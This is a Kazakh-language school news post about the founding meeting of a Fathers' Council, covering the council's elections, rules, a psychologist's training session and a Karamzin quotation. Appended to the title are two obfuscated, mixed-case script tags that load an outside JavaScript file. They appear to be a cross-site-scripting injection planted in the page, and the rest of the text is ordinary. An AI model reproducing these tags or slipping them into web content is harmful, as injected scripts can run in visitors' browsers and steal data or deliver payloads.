Әкелер кеңесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.01.2025

Бүгін мектебімізде Әкелер кеңесі өз жұмысын бастады. Кеңестің негізгі мақсаты – отбасы мен білім беру ұйымы арасындағы тәрбие, оқыту және оқушылар арасындағы келеңсіз көріністердің алдын алу мәселесінде байланысты нығайту.   Әкелердің алғашқы жиналысында Әкелер кеңесінің төрағасы мен мүшелері сайланды. Директордың тәрбие ісі жөніндегі орынбасары ата-аналарды Ережемен және Кеңестің мақсаты, міндеттері және жұмыс жоспарымен таныстырды. Мектеп психологы Швецова Н.Н. тренинг өткізіп, «Бала тәрбиесіндегі әкенің рөлі туралы» бейнеролик көрсетті. Шара өз деңгейінде өтті. Кезінде Николай Михайлович Карамзин: «Барлық мектептер, институттар, интернаттар болғанымен, жақсы әкелерсіз жақсы тәрбие болмайды» деген дана сөздерді жазған болатын.

Просмотров: 784


Пікір қосу



Деректерді қолтаңбаға қосу
Текст